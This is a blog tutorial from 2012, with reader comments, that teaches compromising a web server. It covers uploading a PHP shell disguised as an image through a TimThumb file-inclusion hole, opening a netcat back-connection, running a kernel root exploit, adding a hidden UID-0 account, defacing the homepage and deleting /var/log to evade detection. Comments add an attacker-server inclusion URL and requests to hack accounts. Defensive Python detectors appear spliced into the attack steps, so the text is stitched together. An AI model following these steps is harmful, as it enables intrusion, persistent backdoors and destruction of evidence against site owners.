How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

Posted: 03/02/2012 in Hacking, Linux Hacking, Mac Hacking, Windows Hacking

Tutorial on Web Hacking by Akatzbreaker

Web-Hacking is a huge topic that I could easily discuss for hours.

I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc.) and add more hacking information, tutorials etc.

So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server

Everything you need to know….

Tools you need:

– Backtrack (Backtrack Website)

– Firefox (get it from here….) – Included in Backtrack and Ubuntu

– Netcat (Included in Backtrack) — If you are on other Linux environments get it from here….

– iCon2PHP (Get it from here….)

– A good shell (iCon2PHP Archive includes three great shells)

– A good VPN or Tor (More explanation below…..)

– Acunetix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack

— Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.

(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)

Firefox

— Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….

Netcat

— Netcat is a powerful networking tool. You will need this to root the server….

iCon2PHP & Good Shells

— iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.

Good VPN or TOR (Proxies are good too…)

— While hacking you need to be anonymous so that you cannot be found (even if you forget to delete the logs….). VPN stands for Virtual Private Network, and what it does is hide your IP and encrypt the data you send to and receive from the Internet. A good VPN solution for Windows machines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speed is really slow. So, I wouldn’t recommend a VPN unless you pay and get a paid account.

What I would recommend is Tor. Tor can be used from its bundle, Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world to keep you anonymous and changes these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account.

Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.

— If I listed the above options according to their reliability:

1. Paid VPN Account at ProXPN

2. Tor

3. Free VPN Account at ProXPN

4. Proxy Connection

Acunetix Web Vulnerability Scanner

— Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.

The Consultant Edition (For unlimited websites) costs about 3000-7000$.

____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:

Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

– – –  Before we begin  – – –

-Boot to Backtrack

-Connect to your VPN or to Tor.

-It would be good to read a complete guide to stay anonymous while hacking here…

-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)

Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.

The warning should be something like this. It can mention other information or be a completely different warning (like for SQL Injection – I will post a Tutorial on this also…), depending on the vulnerability. What we need for this tutorial is to be able to exploit the ‘File Inclusion Attack’ and have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)

OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php

The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is an image-editing service on websites.

OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).

For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:

-The website’s blog has a huge vulnerability at TimThumb.

-It is hosted on a Unix System.

Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.

Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.

Generate Output with iCon2PHP

Copy your Image and your Shell to the Folder that iCon2PHP is located.

Run the Program and follow the in-program instructions to build the ‘finalImage.php’.

To avoid any errors while uploading, rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg, jpg, gif….). This is exactly the same file, but it confuses the uploader, which thinks that it actually is an image.

iCon2PHP Terminal Output:

[…]

Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php

Entered!

Valid Files!
[…]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)

Go to the vulnerability and type at the URL:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png

It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.

Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
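
Seen from the defender's side, the request in step 2 shows up in the web server's access log. The following is an added example (not part of the original post and not TimThumb's own code): it flags a src host that merely contains an allow-listed name instead of ending with it, and file names that carry .php ahead of an image extension. The allow-list, the cache path and the log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: the only remote hosts this site wants its thumbnailer to fetch from.
ALLOWED_IMAGE_HOSTS = ("flickr.com", "imgur.com", "upload.wikimedia.org")
THUMB_SCRIPTS = ("thumb.php", "timthumb.php")
# File name with ".php" ahead of an image extension, e.g. "image.php;.png".
DISGUISED_PHP = re.compile(r"\.php[^/]*\.(?:png|jpe?g|gif)$", re.I)
# Apache/nginx "combined" format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')


def host_is_allowed(host):
    """Exact match or true subdomain of an allowed host (label-boundary suffix)."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in ALLOWED_IMAGE_HOSTS)


def embedded_allowed_name(host):
    """Allowed name that appears inside a host which is NOT itself allowed."""
    host = host.lower()
    if host_is_allowed(host):
        return None
    return next((a for a in ALLOWED_IMAGE_HOSTS if a in host), None)


def query_values(query, name):
    """Values of one query parameter; splits on '&' only so ';' stays in the value."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == name:
            values.append(unquote(value))
    return values


def classify(line):
    """Return (client, target, findings) for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, _status = m.groups()
    parts = urlsplit(target)
    findings = []
    if parts.path.rsplit("/", 1)[-1].lower() in THUMB_SCRIPTS:
        for src in query_values(parts.query, "src"):
            remote = urlsplit(src)
            if remote.scheme not in ("http", "https") or not remote.hostname:
                continue  # relative src: a local file, nothing fetched remotely
            if not host_is_allowed(remote.hostname):
                fake = embedded_allowed_name(remote.hostname)
                findings.append("lookalike-host:" + fake if fake else "external-src")
            if DISGUISED_PHP.search(remote.path):
                findings.append("php-in-src-name")
    elif DISGUISED_PHP.search(unquote(parts.path)):
        findings.append("disguised-php-request")
    return client, target, findings


def suspicious(lines):
    """Only the log entries that produced at least one finding."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r[2]]


# Constructed sample log; hosts and paths reuse the tutorial's placeholder URLs.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Mar/2012:10:00:01 +0000] "GET /blog/wp-content/themes/theme_name/thumb.php?src=http://farm1.static.flickr.com/1/cat.jpg&w=90 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Mar/2012:10:04:12 +0000] "GET /blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Mar/2012:10:04:40 +0000] "GET /blog/wp-content/themes/theme_name/scripts/cache/image.php;.png? HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Mar/2012:10:05:02 +0000] "GET /blog/wp-content/themes/theme_name/thumb.php?src=/wp-content/uploads/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, target, findings in suspicious(SAMPLE_LOG):
        print(client, ", ".join(findings), target)
```

The same label-boundary comparison used in host_is_allowed is what a fetch allow-list needs on the server side; a substring test accepts the lookalike host.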

3. Root the Server:

Now that you have shelled your website we can start the process to root the server.

What is rooting when it comes to Server Hacking?
—> Rooting a server is the procedure by which the hacker acquires root privileges on the whole server. If you don’t understand this yet, I reassure you that by the end of the section “Rooting a server” you will have understood exactly what it is…

Let’s proceed to rooting….

Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:

netcat

4. Now type:

-l -n -v -p 402

5. It should have an output like this:

listening on [any] 402 port

6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:

Host:YouIPAddress Port: 402 (or the port you forwarded….)

8. Hit connect and… Voila! Connected to the server!

Downloading and Executing the Kernel exploit:

1. Now, if you type:

whoami

you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:

— The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)

(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))

— Change the permissions of the exploit:
chmod 777 exploit

5. Execute the exploit. Type:

./exploit

6. Root permissions acquired! Type this to ensure:

id

or

whoami

7. Add a new root user:

adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username

8. Change the password of the new root user:

passwd root1

SUCCESSFULLY ROOTED!
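
Steps 7 and 8 leave a persistent artifact: a second account with UID 0 that is listed in several system groups. The audit below is an added example (not from the original post) that parses passwd and group text and reports accounts sharing root's UID or any other UID, together with the groups that list them. The sample files are constructed, and the group names assume a Red Hat-style layout for GIDs 1, 2, 3, 4, 6 and 10.

```python
from collections import defaultdict


def parse_colon_file(text, min_fields):
    """Split passwd/group style text into field lists, skipping blanks and comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= min_fields:
            rows.append(fields)
    return rows


def audit_accounts(passwd_text, group_text):
    """Map each suspicious account to its findings and the groups that list it."""
    by_uid = defaultdict(list)
    for name, _pw, uid, *_rest in parse_colon_file(passwd_text, 7):
        by_uid[uid].append(name)

    report = {}
    for uid, names in by_uid.items():
        for name in names:
            if uid == "0" and name != "root":
                # A non-unique UID 0: the account is root under another name.
                report[name] = {"findings": ["uid-0-not-root"], "groups": []}
            elif uid != "0" and len(names) > 1:
                report[name] = {"findings": ["shared-uid-" + uid], "groups": []}

    # Supplementary memberships give context for every flagged account.
    for gname, _pw, _gid, members in (r[:4] for r in parse_colon_file(group_text, 4)):
        for member in filter(None, members.split(",")):
            if member in report:
                report[member]["groups"].append(gname)
    return report


# Constructed sample files (not taken from any real host).
SAMPLE_PASSWD = """
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
deploy:x:500:500::/home/deploy:/bin/bash
backup:x:500:500::/home/backup:/bin/bash
root1:x:0:0::/home/root1:/bin/bash
"""

SAMPLE_GROUP = """
root:x:0:root
bin:x:1:root,bin,daemon,root1
daemon:x:2:root,bin,daemon,root1
sys:x:3:root,bin,adm,root1
adm:x:4:root,adm,daemon,root1
disk:x:6:root,root1
wheel:x:10:root,root1
apache:x:48:
"""

if __name__ == "__main__":
    for user, info in sorted(audit_accounts(SAMPLE_PASSWD, SAMPLE_GROUP).items()):
        print(user, info["findings"], info["groups"])
```

On a live host, feed it the contents of /etc/passwd and /etc/group and compare the result against a known-good baseline.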

4. Deface the Website:

What is defacing?
Defacing is the procedure by which the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or pass a message to the people or the company (which owns the website…).

Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.

First of all, Unix-based machines have some logs that you had better either edit or delete.
Common Linux log file names and their usage:

/var/log/message: General message and system related stuff
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files

In short, /var/log is the location where you should find all Linux log files.

To delete all of them at once type:

su root1

rm -rf /var/log
mkdir /var/log
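
Removing and recreating the directory is itself observable. The check below is an added example (not from the original post): it reports expected log files that are missing or empty, and running processes that still hold an unlinked log file open, which Linux shows in /proc/<pid>/fd as "path (deleted)". The list of expected log names is an assumption to adjust per distribution.

```python
import os

# Assumption: log files this host normally has; adjust per distribution.
EXPECTED_LOGS = ("auth.log", "kern.log", "wtmp")
DELETED_SUFFIX = " (deleted)"


def missing_logs(log_dir, expected=EXPECTED_LOGS):
    """Expected log files that are absent or empty in log_dir."""
    missing = []
    for name in expected:
        try:
            if os.path.getsize(os.path.join(log_dir, name)) == 0:
                missing.append(name)
        except OSError:
            missing.append(name)
    return missing


def deleted_open_logs(proc_root="/proc", log_prefix="/var/log/"):
    """(pid, path) for processes still writing to a log file that was unlinked.

    Daemons that were not restarted after the directory was recreated keep
    their old descriptors, so the wiped files remain visible through procfs.
    """
    hits = set()
    try:
        pids = [p for p in os.listdir(proc_root) if p.isdigit()]
    except OSError:  # no procfs on this platform
        return []
    for pid in pids:
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:  # process exited or access denied
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target.startswith(log_prefix) and target.endswith(DELETED_SUFFIX):
                hits.add((int(pid), target[: -len(DELETED_SUFFIX)]))
    return sorted(hits)


def wipe_indicators(log_dir="/var/log", proc_root="/proc", log_prefix=None):
    """Combine both checks; 'suspect' is a lead to investigate, not a verdict."""
    prefix = log_prefix or log_dir.rstrip("/") + "/"
    missing = missing_logs(log_dir)
    orphans = deleted_open_logs(proc_root, prefix)
    return {
        "missing_or_empty": missing,
        "deleted_but_open": orphans,
        "suspect": bool(orphans) or len(missing) == len(EXPECTED_LOGS),
    }


if __name__ == "__main__":
    print(wipe_indicators())
```

Run it as root so every process's descriptor table is readable. A daemon that missed a logrotate signal also appears under deleted_but_open, so correlate a hit with copies of the logs forwarded to another host.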

End of this Tutorial:

This was a great tutorial on Web-Hacking. I reassure you that more hacking tutorials are coming.
Great community about hacking at Hackforums.net

 

You can also check this Post out, if you like this Tutorial….

____________________________________________________________________

Akatzbreaker

Comments
    • gnahackteam says:

      DISCLAIMER:

      The above tutorial is for educational purposes only. It does NOT promote any damage to others work/property. It is your responsibility how to use the knowledge you get from this blog.

    • Dave Yang says:

      how can i get a good unzip shell for upload

  1. Its like you learn my mind! You appear to grasp a lot about this, like you wrote the book in it or something. I believe that you just could do with some percent to drive the message house a little bit, but instead of that, that is fantastic blog. A fantastic read. I’ll definitely be back.

  2. Hey There. I found your blog using msn. This is a really well written article. I’ll make sure to bookmark it and return to read more of How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks] G.N.A. Team . Thanks for the post. I’ll certainly return.

  3. It was excited to come across your site a short while ago. I arrived here today hoping to learn interesting things. I was not upset. Your well thought out ideas with new strategies on this subject matter were enlightening and a great help to me. Thank you for making time to create these things and for sharing your mind.

  4. I truly same when you plow this write of sundry internal your posts. Perhaps could you remain this?

  5. After examine a few of the blog posts on your website now, and I really like your means of blogging. I bookmarked it to my bookmark web site record and will likely be checking again soon. Pls check out my web page as nicely and let me know what you think.

  6. I might publish a post on how to root a remote Unix (Linux) machine if any Root Kernel Exploit is NOT available….

  7. sanam says:

    best article i have ever read.. thanks. and *thumbsup* for the great work

  8. I forgot to mention some things:
    + This exploit is successful because the uploaded image (or in this example: our Shell) is saved in the cache of WordPress. Thus we might need to go with our browser:
    http://www.site.com/blog/wp-content/themes/theme_name/scripts/cache/image.php;.png?

    In this way the shell will be executed (don’t forget the ? at the end)

    + You can use other methods to Root a Server (if a Local Root Kernel Exploit is not Available).
    Like Social-Engineering. (You don’t even need a tool, maybe some programming skills).

    I hope I solved some more Questions….

  9. If you like this Post, you will love this video on how to Hack a Server. In the video, an SQL Injection Vulnerability is exploited, and the shell is uploaded from an image Uploader on the Admin Panel. Then, the server is Rooted by a Public Local Root Exploit.

    The video link: http://youtu.be/tYD8JRG8JE4

    Credits to HaxOr for the HQ Video!

  10. You might also be interested in Web Application Firewall Bypassing: http://is.gd/FNyZLS

  11. If you like this Post, check this Tutorial out: http://is.gd/MPct4V

  12. Alexandra says:

    Oh my goodness! Impressive article dude! Thank you, However I am having problems with your
    RSS. I don’t know why I can’t join it. Is there anybody else
    getting similar RSS issues? Anyone who knows the answer will you kindly respond?

    Thanx!!

  13. Akshay says:

    G.N.A Hack Team- You guys won’t believe but i have been active on quite many forums, but there’s a remarkable spark in your tutorials. I mean if i have to say foolproof, tht wud be it. It’s an awesome way of understanding the reader and putting it across. Also, i wish to ask, whether is there any tutorial on how to upload shells on servers that simply ‘Rename your PHP’ file inspite of using tamper script or ‘Live HTTP Header’? Because although i am trying to upload my SHELL on sites, it just says, “Cannot read with error, or my file is not visible in their database or just renamed to .JPG. Any kinda help will be highly appreciated. Thanks guys! Awaiting for a prompt reply from your end.

  14. hacky says:

    The best tutOrIal i’ve ever seen!!!!!!!

  15. hackla4440 says:

    I love this tutorial could you please explain about ANONYMOUS surfing please or give me a tutorial and please help me via my email hackla4440@gmail.com

  16. […] this is just a copy-paste from https://gnahackteam.wordpress.com/2012/03/02/how-to-hack-a-server-shell-uploading-rooting-defacing-co… […]

  17. Ano2o00 says:

    This is also a nice and good Injector shell …http://pastebin.com/AZQnfmXH

  18. rajasekar says:

    I tried not working on local host

    localhost/wordpress/wp-content/themes/thesis/lib/scripts/thumb.php?src=http://localhost/iCon2PHP/image.php;.png

    Error Log

    Warning: imagecreatefrompng(): ‘C:/wamp/www///iCon2PHP/image.php;.png’ is not a valid PNG file in C:\wamp\www\wordpress\wp-content\themes\thesis\lib\scripts\thumb.php on line 248

    Can any one help me plz

  19. aman says:

    you followed a bottom to top approach..that is really appreciable…great to see that some blogs still providing stuff like this..keep it up.. 🙂

  20. It’s really a nice and useful piece of information. I am glad that you shared this helpful info with us. Please stay us informed like this. Thank you for sharing.

  21. how to use python file on windows?? please share me the tutor if u dont mind 🙂

  22. abhi says:

    exploit links are not working , please help

  23. richard says:

    i have a question, i read somewhere that you should upload a shell like this “http://www.site.com/index.php?page=http://www.attackersserver.com/my_evil_script.txt?” just as an example, because if you upload it with a .php extention it wont work, i looked at how you did it with “image.php;.png” and wanted to ask is it true that you should upload the shell as a txt etc and also when i tested a shell on 000webhost as a txt it couldnt find the file could you tell me why and is that the right way to do it?

  24. Calvin says:

    Greetings! Very helpful advice in this particular article!
    It’s the little changes that will make the most important changes. Thanks for sharing!

  25. 49343 says:

    Great site from what I’ve seen thus far. My name’s Venetta
    and I’m very glad to view your site. In fact, I’d love to
    get in touch with you. Will you make sure you drop me a e-mai?

  26. anon says:

    i used a port scanner to see what ports i have open.. which is successful, but when i try back connect.. it doesnt connect at all? what did i do wrong?

  27. M says:

    hey im pleased to see a fellow revolutionary join us in legion against government mayhem shed wisdom fight for your knowledge stay enlighten .>M< p.s teach your wisdom to help us.

  28. Zack says:

    You jut taught a 14 yr old how to hack . Thanks!

  29. Right here is the perfect web site for anybody who wishes
    to understand this topic. You understand a whole lot its almost hard to argue with you (not that
    I really would want to…HaHa). You definitely put a new spin on a subject that’s been written about for years. Great stuff, just great!

  30. Very nice online site. Excellent weblog article in
    relation to How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks] | G.
    N.A. Team. You actually possess the approach for success materializing here.
    I will take note of your online site and come back later on.

  33. noeladna says:

    this work is awesome…. i am still trying how to make my work a successful one…

  35. Eng Young says:

    Nice topic bro i have littel ques so
    1.i wanna create my own shell how to do
    2.when i create the shell how i can replace it in to index page to get access
    3.when i want to get or hack site.com/admin.php and put my hacking image what do i do
    sorry if i make you confuse thanks
    hope to help me

    • Lets start with the second question: you shouldn’t replace the index page with the shell. Otherwise everyone will have access to it. Even if it is password protected, it is going to be annoying!

      Also, to create a shell, you can change the code of an existing one. The most shells have the same functionalities. So why creating a new one? It is not worth spending the time…

      And for your last question: it isn’t always possible to hack a page with an image…
      You can follow the instructions but they are for specific conditions

  36. Saurabh says:

    successfully uploaded the shell created from iCon2PHP .. however, http://sample.com/test/image.php;.png? does not show shell .. just the small image .. what am I doing wrong?
    output for both the following link is the same:
    http://sample.com/test/image.php;.png?

    advice

  37. Saurabh says:

    a little background:
    basically the vulnerable target has unauthenticated access through a misconfigured WebDav server.. I have created the shell as detailed above .. I have uploaded it to the directory … when I upload a clear picture I can see the image as part of the application .. but the shell is not executed..

  38. srsingh888@gmail.com says:

    It is simply a great tutorial and an eye opener for sys admins

  39. s3cg33k says:

    i’m not able to download Acunentix with crack could u share direct link or torrent to download is ! , if u can make it by email plz ,
    thanx for this great article

  40. Matiass says:

    6. Now, go to the Back-Connection function at the Shell.
    7. Complete with the following:

    I do not understand this. Also after uploading the shell.php;.png I’m lost. How does the shell recognise to send the commands? I uploaded this to a photo uploader, can I do execution from there?

  41. What’s up mates, its fantastic piece of writing on the topic of teachingand entirely explained, keep it up all the time.

  42. Robert says:

    this tutorial is well written about how to hack a server plus uploading shell please i have a little bit problem there the part where you uploaded the shell to a free domain….and add it to your vulnerability website….that is not my major issue my problem here is that i trried to upload the image.php;.png to a website that i have its admin panel access but still i get error….then i tried it too with a vulnerabilty website and put in the link to my finallmage.php;.png but its still says error syntax i want you to explain more future from that part i understand every part of it but that main place is confusing.Please throw a little light to it for better understanding.Thanks

  43. Fragz says:

    Plz Can U teach me How To Hack A Fb Account i wanna hack my old Account which was hacked by somebody else!

  47. Vishal SR says:

    hello i don’t even know the ‘H’ of hacking but i want to learn wht should i do will u train me, i just have the determination, thnx

  48. Heya i’m for the primary time here. I found this board annd I to
    find It truly useful & it helped me out much.

    I hope to offer one thing again and aid otheds such as you aided me.

  49. Yeѕ! Finally ѕomething aboput libres gratis.

  50. livres mobi says:

    Wonderful blog! Do you have any helpful hints for aspiring writers?
    I’m hoping to start my own blog soon but I’m a little lost on everything.
    Would you recommend starting with a free platform like WordPress or
    go for a paid option? There are so many options out there that
    I’m totally confused .. Any suggestions? Many thanks!

  51. Alp Fatih says:

    Great and detailed tutorial.

  52. Everything is very open with a clear clarification of the issues.
    It was truly informative. Your site is very useful. Thank you for sharing!

  53. I’ve been browsing online more than 2 hours today, yet I never found any
    interesting article like yours. It is pretty worth enough for me.
    Personally, if all webmasters and bloggers made good content as you
    did, the internet will be a lot more useful than ever before.

  54. Quality posts is the crucial to be a focus for the people to visit the
    web page, that’s what this web page is providing.

  55. These are actually impressive ideas in on the topic of blogging.
    You have touched some fastidious points here. Any way keep up wrinting.

  56. vade walez says:

    this is really great but i have a problem with installing back track,every time i try to install i get a black background,please illustrate me on how to install,i have been on this for three weeks now

  58. Scorpion says:

    Thanks Man…

  59. Scorpion says:

    Dude…

    How to find vulnerable site ???

    Is there type of dork for this ???????

  60. Kent says:

    The best tutorial i will ever seen
    I found this board and I to find It truly useful & it helped me out much.
    Great Post
